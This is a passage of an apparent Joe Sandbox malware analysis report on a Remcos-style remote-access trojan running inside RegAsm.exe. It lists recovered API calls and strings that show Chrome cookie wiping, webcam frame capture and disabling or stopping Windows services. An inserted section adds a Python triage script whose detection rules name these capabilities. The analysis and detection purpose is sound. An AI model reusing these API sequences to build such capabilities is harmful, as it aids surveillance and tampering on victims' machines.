                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                  • API String ID: 2018770650-304995407
                                                                                                                                  • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                  • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
Strings
• 8)3, xrefs: 004076D2
• C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
• Rmc-IAW1Y3, xrefs: 00407715
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: 8)3$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-IAW1Y3
• API String ID: 0-404744483
• Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
• Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
• Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
• Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
APIs
• __allrem.LIBCMT ref: 0043ACE9
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
• __allrem.LIBCMT ref: 0043AD1C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
• __allrem.LIBCMT ref: 0043AD51
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
• Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
• Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
• Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
APIs
• Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
• API String ID: 3469354165-3054508432
• Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
• Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
• Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
• Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
APIs
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
• Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
• Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
• Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
APIs
• _strlen.LIBCMT ref: 10001607
• _strcat.LIBCMT ref: 1000161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
• lstrcatW.KERNEL32(?,?), ref: 1000165A
• lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
• lstrcatW.KERNEL32(00001008,?), ref: 10001686
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
• Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
• Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
• Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
• Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
APIs
• lstrcatW.KERNEL32(?,?), ref: 10001038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
• Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
• Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
• Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
• Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
• Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
• Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
• Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
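The function blocks above list, per recovered function, its API calls with the argument values the sandbox captured, the strings it references, and the similarity identifiers. The Python below is an added example and is neither part of the Joe Sandbox report nor code from the Remcos sample: it parses that block layout and tags the capabilities an analyst reads off these particular blocks (the Chrome cookie wiping strings next to a DeleteFile/GetLastError API ID, the OpenCamera/GetFrame/FreeFrame/CloseCamera strings, the "Rmc-" mutex-style string beside the RegAsm.exe host path, and ChangeServiceConfigW called with dwStartType 4, which is SERVICE_DISABLED). The embedded excerpt is constructed from the blocks above and trimmed; the reading of the "API ID" field as a concatenation of API-name tokens is an assumption, and the rule set is illustrative rather than the sandbox's own signature logic.

```python
"""Capability triage over Joe Sandbox per-function blocks (added example)."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: four of the function blocks in this report, trimmed to
# the fields the rules need. A block ends at its "Instruction Fuzzy Hash" line.
SAMPLE_REPORT = r"""
Strings
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
• [Chrome Cookies found, cleared!], xrefs: 0040BB48
Similarity
• API ID: DeleteErrorFileLast
• Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
Strings
• C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
• Rmc-IAW1Y3, xrefs: 00407715
Similarity
• API ID:
• Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
APIs
• Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
• Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                    r"(?P<name>[^\s(]+?)\.(?P<mod>[A-Z0-9]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*[0-9A-F]+$")
STR_RE = re.compile(r"^•\s*(?P<s>.*), xrefs: [0-9A-F]+$")
KV_RE = re.compile(r"^•\s*(?P<k>API ID|String ID|Instruction Fuzzy Hash):\s*(?P<v>.*)$")
# dwStartType values accepted by ChangeServiceConfigW (winsvc.h)
SERVICE_START = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START",
                 2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START",
                 4: "SERVICE_DISABLED"}


@dataclass
class Block:
    apis: list = field(default_factory=list)     # (name, module, [hex args])
    strings: list = field(default_factory=list)  # Strings section + String ID tokens
    api_id: str = ""
    fuzzy: str = ""


def parse_blocks(text):
    """Split the report text into per-function Blocks."""
    blocks, cur, section = [], Block(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif (kv := KV_RE.match(line)):
            key, val = kv.group("k"), kv.group("v").strip()
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.strings.extend(s for s in val.split("$") if s)
            else:  # the instruction fuzzy hash is the last line of every block
                cur.fuzzy = val
                blocks.append(cur)
                cur = Block()
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append((m.group("name"), m.group("mod"), args))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append(m.group("s"))
    return blocks


def decode_arg(args, index):
    """Hex argument as int; None when missing or '?' (not recovered by the sandbox)."""
    if index >= len(args) or args[index] == "?":
        return None
    return int(args[index], 16)


def triage(block):
    """Capability tags for one block. Illustrative rules, not the sandbox's own."""
    tags, names = [], {name for name, _, _ in block.apis}
    # Cookie DB path plus DeleteFile (explicit API or "Delete"/"File" in the API ID)
    if any(r"Chrome\User Data\Default\Cookies" in s for s in block.strings) and (
            names & {"DeleteFileA", "DeleteFileW"}
            or ("Delete" in block.api_id and "File" in block.api_id)):
        tags.append("browser-artifact-wipe:chrome-cookies")
    if {"OpenCamera", "GetFrame"} <= set(block.strings):
        tags.append("webcam-capture")
    if any(s.startswith("Rmc-") for s in block.strings):  # Remcos mutex naming
        tags.append("remcos-mutex-prefix")
    if any(s.lower().endswith("regasm.exe") for s in block.strings):
        tags.append("regasm-host-path")
    for name, _, args in block.apis:
        if name == "ChangeServiceConfigW":
            start = decode_arg(args, 2)  # third parameter is dwStartType
            if start in SERVICE_START:
                tags.append("service-config:" + SERVICE_START[start])
    return tags


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE_REPORT):
        print(b.fuzzy[:8], triage(b) or "-")
```

Arguments the sandbox could not recover are printed as `?`; the service name passed to OpenServiceW is one of them, so the rule reports the start-type change without naming the service. The desired-access value 0x2 on OpenServiceW is SERVICE_CHANGE_CONFIG, consistent with the ChangeServiceConfigW call that follows.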
APIs
• GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
• SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
• Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
• Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
• Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                  • _free.LIBCMT ref: 004482CC
                                                                                                                                  • _free.LIBCMT ref: 004482F4
                                                                                                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                  • _abort.LIBCMT ref: 00448313
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                  • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                  • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                  • _free.LIBCMT ref: 10005B2D
                                                                                                                                  • _free.LIBCMT ref: 10005B55
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                  • _abort.LIBCMT ref: 10005B74
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                  • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                  • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                  • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                  • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                  • __freea.LIBCMT ref: 100087D5
                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 2652629310-2459865102
                                                                                                                                  • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                  • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
